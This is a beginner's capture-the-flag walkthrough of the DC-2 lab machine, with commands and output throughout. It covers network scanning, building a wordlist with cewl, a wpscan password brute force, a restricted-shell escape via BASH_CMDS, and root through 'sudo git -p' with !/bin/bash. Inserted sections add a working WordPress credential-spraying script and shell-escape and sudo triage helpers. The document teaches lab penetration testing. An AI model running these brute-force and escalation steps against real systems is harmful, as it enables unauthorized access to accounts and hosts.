Newbie's DC Series Target Machine Walkthrough: DC-2

After finishing DC-1, on to DC-2.

1. Define the goal

The goal is the same as before: find every flag on the box.

Each flag's hint points to the next flag.

2. Information gathering

The target sits on the same subnet as the attacking machine,

so an arp-scan is enough to find it:

└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:f2:1a:d5, IPv4: 192.168.0.111
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.1     f4:6a:92:10:12:f2       SHENZHEN FAST TECHNOLOGIES CO.,LTD
192.168.0.104   58:a0:23:79:16:11       Intel Corporate
192.168.0.100   48:2c:a0:e5:36:51       Xiaomi Communications Co Ltd
192.168.0.103   8c:c8:4b:60:79:f1       CHONGQING FUGUI ELECTRONICS CO.,LTD.
192.168.0.131   8c:c8:4b:60:79:f1       CHONGQING FUGUI ELECTRONICS CO.,LTD.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.998 seconds (128.13 hosts/sec). 5 responded

There are only a few machines in this environment, and the target is clearly 192.168.0.131.

3. Vulnerability discovery

Run nmap -A -p- to gather service information (compared with DC-1, the -p- option is added so that all 65535 ports are scanned instead of the default top 1000):

└─# nmap -A -p- 192.168.0.131
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-20 14:41 CST
Nmap scan report for localhost (192.168.0.131)
Host is up (0.0065s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)    # ssh has been moved to port 7744
| ssh-hostkey:
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 8C:C8:4B:60:79:F1 (Chongqing Fugui Electronics)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   6.52 ms localhost (192.168.0.131)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.07 seconds

Two things stand out: the web server redirects to http://dc-2/, a hostname that does not resolve yet, and SSH is on 7744, which a default top-1000-port scan would have missed entirely.

Next, run nmap's built-in vuln script category against the target:

└─# nmap --script=vuln 192.168.0.131
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-20 15:46 CST
Nmap scan report for dc-2 (192.168.0.131)
Host is up (0.0056s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=dc-2
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://dc-2:80/index.php/what-we-do/%5c%22
|     Form id: search-form-60f6f0078fbec
|     Form action: http://dc-2/
|
|     Path: http://dc-2:80/index.php/flag/%5c%22
|     Form id: search-form-60f6f0088cc0d
|_    Form action: http://dc-2/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:                                # nmap's path enumeration
|   /wp-login.php: Possible admin folder    # this should be the login page
|   /readme.html: Wordpress version: 2
|   /: WordPress version: 4.7.10
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|_  /readme.html: Interesting, a readme.
| http-sql-injection:
|   Possible sqli for queries:
|     http://dc-2:80/wp-includes/js/jquery/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://dc-2:80/wp-includes/js/jquery/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://dc-2:80/wp-includes/js/jquery/?C=M%3bO%3dA%27%20OR%20sqlspider
|_    http://dc-2:80/wp-includes/js/jquery/?C=N%3bO%3dD%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users:
| Username found: admin     # the usernames get enumerated as well
| Username found: tom
| Username found: jerry
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
MAC Address: 8C:C8:4B:60:79:F1 (Chongqing Fugui Electronics)

Nmap done: 1 IP address (1 host up) scanned in 33.62 seconds

The http-csrf and http-sql-injection hits are noise (a search form, and the sort parameters of an Apache directory listing under /wp-includes/js/jquery/); the useful results are the WordPress version (4.7.10), the login page at /wp-login.php and the three usernames admin, tom and jerry. Nothing more to get here, so let's open the site in a browser.

Hmm, it doesn't load. The site redirects to http://dc-2/ (which the http-title line of the first scan already pointed out), and that hostname doesn't resolve, so browsing by IP gets us nowhere.

Adding an entry to the hosts file fixes that:

vim /etc/hosts
127.0.0.1       localhost
127.0.1.1
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.0.131   dc-2  # added line

Found flag 1:

Flag 1:
Your usual wordlists probably won't work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can't win them all.
Log in as one to see the next flag.
If you can't find it, log in as another.
# cewl; more passwords isn't always better; log in to see the next flag; there is more than one account

So the next flag requires logging in. cewl is one of Kali's password-attack tools: it crawls a website and builds a wordlist from the words found on its pages, which is exactly what the hint is pointing at (the site's text is lorem-ipsum-style Latin, so a normal dictionary won't contain the passwords).

Use cewl to build a wordlist from the site:

└─# cewl http://dc-2 -w dc2pwd.txt
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
└─# ls
公共  模板  视频  图片  文档  下载  音乐  桌面  dc2pwd.txt

Then put the usernames that nmap enumerated into a file:

└─# vim dc2usr.txt
└─# cat dc2usr.txt
admin
tom
jerry

4. Exploitation

Brute-force the passwords with wpscan:

└─# wpscan --url http://dc-2 -U dc2usr.txt -P dc2pwd.txt
[WPScan ASCII-art banner]
WordPress Security Scanner by the WPScan Team
Version 3.8.18
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [192.168.0.131]
[+] Started: Wed Jul 21 21:34:22 2021

Interesting Finding(s):
'------------------------omitted-----------------------------'

[!] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient             # passwords found

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Jul 21 21:35:37 2021
[+] Requests Done: 1055
[+] Cached Requests: 5
[+] Data Sent: 479.891 KB
[+] Data Received: 893.479 KB
[+] Memory used: 240.852 MB
[+] Elapsed time: 00:01:15
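The two steps above (build a site-specific wordlist, then try every user against every word) can be reproduced without either tool. The following is an added example and not code from the original post: a cewl-style word extractor and a credential spray loop in POSIX sh. The HTML page, the user list and the `fake_login_ok` oracle are constructed so that the loop runs offline; `wp_login_ok` is the real check against wp-login.php and needs the target. The names `cewl_like`, `spray` and the temporary directory are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not code from the original post: a cewl-style wordlist
# builder plus a WordPress credential spray loop.  The HTML page, the user
# list and the "fake" login oracle below are constructed so the loop can be
# exercised offline; wp_login_ok is the real check and needs the target.

# Build a wordlist the way cewl does: drop HTML tags, split on anything that
# is not a letter, keep words of at least $2 characters, dedupe.
cewl_like() {                       # $1 = HTML file, $2 = minimum word length
    sed -e 's/<[^>]*>/ /g' "$1" \
      | tr -cs 'A-Za-z' '\n' \
      | awk -v min="$2" 'length($0) >= min' \
      | sort -u
}

# Real login check against wp-login.php (not run offline).  WordPress answers
# a correct login with a 302 redirect plus a wordpress_logged_in_* cookie and
# a wrong one with 200 and the form again, so the status code is enough.
wp_login_ok() {                     # $1 = base URL, $2 = user, $3 = password
    code=$(curl -s -o /dev/null -w '%{http_code}' \
        --data-urlencode "log=$2" --data-urlencode "pwd=$3" \
        --data 'wp-submit=Log+In' "$1/wp-login.php")
    [ "$code" = "302" ]
}

# Try every user against every password; prints "user:password" for hits.
# Lockout plugins or fail2ban would notice the volume: wpscan needed 1055
# requests for three users on DC-2.
spray() {            # $1 = user file, $2 = wordlist, $3 = check function, $4 = URL
    while IFS= read -r u; do
        while IFS= read -r p; do
            if "$3" "$4" "$u" "$p"; then
                printf '%s:%s\n' "$u" "$p"
            fi
        done < "$2"
    done < "$1"
}

# --- constructed demo data (stands in for the DC-2 site and its users) ---
TMP=${TMPDIR:-/tmp}/dc2_example.$$
mkdir -p "$TMP"
cat > "$TMP/page.html" <<'EOF'
<html><body><h1>DC-2 sample</h1>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec parturient
montes nascetur ridiculus mus. Log in to see the next flag.</p></body></html>
EOF
cewl_like "$TMP/page.html" 5 > "$TMP/dc2pwd.txt"
printf 'admin\ntom\njerry\n' > "$TMP/dc2usr.txt"

# Offline stand-in for wp_login_ok with the same signature: a constructed
# oracle that accepts the two pairs wpscan found on DC-2 and nothing else.
fake_login_ok() {
    case "$2:$3" in
        tom:parturient|jerry:adipiscing) return 0 ;;
        *) return 1 ;;
    esac
}

found_pairs() {
    spray "$TMP/dc2usr.txt" "$TMP/dc2pwd.txt" fake_login_ok http://dc-2
}

found_pairs        # tom:parturient and jerry:adipiscing; admin stays unknown
```

Against the real box, replace `fake_login_ok` with `wp_login_ok` in `found_pairs`. The point of the pluggable check is that the loop, the wordlist and the success criterion are three separate things: wpscan's value is mostly in the last one (it also parses the login response), and a 302 from wp-login.php is the simplest reliable signal.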

wpscan found passwords for jerry and tom but not for admin (the "you just can't win them all" part of the hint). We have two sets of credentials and nmap already found the login page, so log in:

/wp-login.php: Possible admin folder     # login page from the nmap enumeration
| Username: jerry, Password: adipiscing  # credentials
| Username: tom, Password: parturient

Flag 2 is under the Pages tab:

Flag 2:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.

The initial scan showed SSH open on 7744, and we have user passwords, so try them over SSH in case the same passwords are reused for the system accounts.

Logging in as jerry over SSH fails:

└─# ssh jerry@192.168.0.131 -p 7744
The authenticity of host '[192.168.0.131]:7744 ([192.168.0.131]:7744)' can't be established.
ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.0.131]:7744' (ECDSA) to the list of known hosts.
jerry@192.168.0.131's password: adipiscing
Permission denied, please try again.
jerry@192.168.0.131's password: adipiscing
Permission denied, please try again.
jerry@192.168.0.131's password: adipiscing
jerry@192.168.0.131: Permission denied (publickey,password).

tom works:

└─# ssh tom@192.168.0.131 -p 7744
tom@192.168.0.131's password: parturient

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ ls          # flag3 is right here
flag3.txt  usr
tom@DC-2:~$ cat         # quite a few commands seem to be blocked
-rbash: cat: command not found
tom@DC-2:~$ find
-rbash: find: command not found

Take a look at it. The error prefix says -rbash: tom's login shell is a restricted bash, and the missing commands mean its PATH is limited (probably to that usr directory in tom's home), so cat and find simply aren't found.

# flag3 (the file is flag3.txt):
Poor old Tom is always running after Jerry.
Perhaps he should su for all the stress he causes.
# "su for" is a pun: su means switch user. Try it.
tom@DC-2:~$ su
-rbash: su: command not found
# No luck

To get past -rbash, I looked up a blog post on breaking out of a restricted shell (that post explains it well).

Dropping into a different shell. BASH_CMDS is bash's command hash table; assigning BASH_CMDS[a]=/bin/sh makes the name a run /bin/sh, which sidesteps rbash's ban on command names containing a slash:

tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ cd ..
# still many commands missing, but cd works now
$ ls
jerry  tom
# jerry's home directory is visible
$ cd jerry
$ ls
flag4.txt
$ vi flag4.txt
# found flag4

flag4:

Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).   # root, obviously
No hints here - you're on your own now.  :-)
Go on - git outta here!!!!   # privilege escalation via git?

The shell we dropped into still can't find most commands because it inherited the restricted PATH. Start a proper bash and extend PATH:

$ /bin/bash
# fix the environment variable
tom@DC-2:~$ export PATH=$PATH:/bin/
# check that it worked
tom@DC-2:~$ su
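What rbash actually refuses, and whether the BASH_CMDS trick above works against a given bash, can be checked locally. The following is an added example, not code from the original post; it assumes a `bash` binary is on PATH and invokes it as `bash -r`, which is the same restricted mode as an rbash login shell. The function names are made up for this example.

```shell
#!/bin/sh
# Added example, not from the original post: probe which operations a
# restricted bash refuses and test whether the BASH_CMDS trick used above
# works against the bash installed here.  Assumes bash is on PATH.

# Run a command string in a fresh restricted bash; 0 means rbash allowed it.
under_rbash() {
    bash -r -c "$1" >/dev/null 2>&1
}

# The restrictions the walkthrough ran into, one per entry: changing
# directory, changing PATH, naming a command by path, redirecting output.
# Prints a table and returns 0 only if rbash refused all of them.
probe_restricted() {
    all_refused=0
    for cmd in 'cd /' 'PATH=/bin' '/bin/echo hi' 'echo hi > /dev/null'; do
        if under_rbash "$cmd"; then
            printf 'ALLOWED  %s\n' "$cmd"
            all_refused=1
        else
            printf 'refused  %s\n' "$cmd"
        fi
    done
    return $all_refused
}

# The escape from the walkthrough: BASH_CMDS is bash's command hash table,
# so hashing the name "a" to /bin/sh runs a shell without a slash ever
# appearing on the command line, which is the thing rbash checks for.
# Recent bash releases refuse a BASH_CMDS value containing "/" in restricted
# mode, so this returns 0 only on an old bash such as the Debian 8 one on DC-2.
rbash_escape_works() {
    under_rbash 'BASH_CMDS[a]=/bin/sh; a -c "exit 0"'
}

if probe_restricted; then echo "all four restrictions enforced"; fi
if rbash_escape_works; then
    echo "BASH_CMDS escape: works on this bash"
else
    echo "BASH_CMDS escape: refused on this bash"
fi
```

The caveat this makes visible: the restriction is enforced by the shell, not the kernel, so it only holds for commands the shell itself starts. Anything on tom's PATH that can spawn a process (vi's `:!sh`, or a pager, as the git step later shows for sudo) leaves rbash behind, and the new process inherits a normal, writable PATH that just needs /bin added back.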

(flag4 was a shortcut: we read jerry's file while still being tom. Now switch to jerry properly.)

tom@DC-2:~$ su jerry
Password: adipiscing
jerry@DC-2:/home/tom$ cd
jerry@DC-2:~$
# switched to jerry

The flag hints at git for privilege escalation, so try it. jerry is allowed to run git through sudo, and git with -p (--paginate) sends its output through a pager that then runs as root; typing !/bin/bash at the pager's prompt spawns a shell with the pager's privileges. The same applies to any sudo-permitted binary that opens a pager or an editor.

jerry@DC-2:~$ sudo git -p help    # the pager opened by git runs as root; !/bin/bash inside it gives a root shell
usage: git [--version] [--help] [-C <path>] [-c name=value]
           [--exec-path[=<path>]] [--html-path] [--man-path] [--info-path]
           [-p|--paginate|--no-pager] [--no-replace-objects] [--bare]
           [--git-dir=<path>] [--work-tree=<path>] [--namespace=<name>]
           <command> [<args>]

The most commonly used git commands are:
   add        Add file contents to the index
   bisect     Find by binary search the change that introduced a bug
   branch     List, create, or delete branches
   checkout   Checkout a branch or paths to the working tree
   clone      Clone a repository into a new directory
   commit     Record changes to the repository
   diff       Show changes between commits, commit and working tree, etc
   fetch      Download objects and refs from another repository
   grep       Print lines matching a pattern
   init       Create an empty Git repository or reinitialize an existing one
   log        Show commit logs
   merge      Join two or more development histories together
   mv         Move or rename a file, a directory, or a symlink
   pull       Fetch from and integrate with another repository or a local branch
   push       Update remote refs along with associated objects
   rebase     Forward-port local commits to the updated upstream head
   reset      Reset current HEAD to the specified state
   rm         Remove files from the working tree and from the index
   show       Show various types of objects
   status     Show the working tree status
   tag        Create, list, delete or verify a tag object signed with GPG
!/bin/bash

Root obtained; read the last flag:

root@DC-2:/home/jerry# whoami
root
root@DC-2:/home/jerry# cd
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt
[ASCII-art banner]

Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.
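The git step works because of a sudo rule, and the first thing to do after landing on a box as a new user is to read `sudo -l` for rules of that kind. The following is an added example, not code from the original post: a small sh filter that reads `sudo -l` output and flags entries whose binary hands control to a pager or editor. The `sudo -l` text is constructed to mirror what the git step relies on (the walkthrough never captured the real output), and the list of risky binaries is an assumption for the example, not a complete one.

```shell
#!/bin/sh
# Added example, not from the original post: triage `sudo -l` output for
# binaries that hand control to a pager or editor, the class git belongs to.
# The sudo -l text is constructed to mirror what the git step relies on
# (jerry may run git as root); the binary list is an assumption, not complete.

# Commands whose normal operation opens $PAGER/$EDITOR or has a "!command"
# escape; sudo on any of them is sudo on a shell.
SHELL_ESCAPE_BINS='git less more man vi vim view nano'

# Read sudo -l output on stdin and print one line per risky entry.
# Entries look like "    (root) NOPASSWD: /usr/bin/git, /usr/bin/less".
triage_sudo_l() {
    grep -E '^[[:space:]]*\([^)]*\)' \
      | sed -e 's/^[[:space:]]*([^)]*)[[:space:]]*//' \
            -e 's/^\([A-Z]*:[[:space:]]*\)*//' \
      | tr ',' '\n' \
      | while IFS= read -r entry; do
            entry=$(printf '%s' "$entry" | sed 's/^[[:space:]]*//; s/[[:space:]]*$//')
            [ -n "$entry" ] || continue
            if [ "$entry" = "ALL" ]; then
                printf 'ALL\tunrestricted root\n'
                continue
            fi
            bin=$(basename "${entry%% *}")      # first token, without its path
            for risky in $SHELL_ESCAPE_BINS; do
                if [ "$bin" = "$risky" ]; then
                    printf '%s\tspawns a pager/editor: root shell via !/bin/sh\n' "$entry"
                fi
            done
        done
}

# Constructed sample, modelled on DC-2's jerry; the real output on the box
# was not captured in the walkthrough.
SAMPLE_SUDO_L='Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
    (root) /usr/bin/id'

triage_sample() {
    printf '%s\n' "$SAMPLE_SUDO_L" | triage_sudo_l
}

triage_sample      # prints only the git line; id is harmless
```

On a real host, pipe `sudo -l` straight into `triage_sudo_l`. From the defensive side the lesson is the same: a sudo rule on git cannot be made safe by restricting arguments, because the pager is also chosen through core.pager and the environment; the rule itself has to go.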

5. Summary

  • Edit the hosts file so the site's redirect to its hostname resolves

    vim /etc/hosts

  • Build a site-specific wordlist with cewl

    cewl [url] -w [wordlist.file]

  • Brute-force WordPress logins with wpscan

    wpscan --url [url] -U [username.file] -P [password.file]

  • Break out of -rbash by hashing a name onto a shell, then fix PATH

    BASH_CMDS[a]=/bin/sh;a

    export PATH=$PATH:/bin/

  • Escalate to root through git under sudo

    sudo git -p help

    !/bin/bash

(I'm new to penetration testing; most of the later parts were done by following other people's write-ups together with my own thinking.)

If you have questions, feel free to discuss in the comments or by private message so we can improve together.
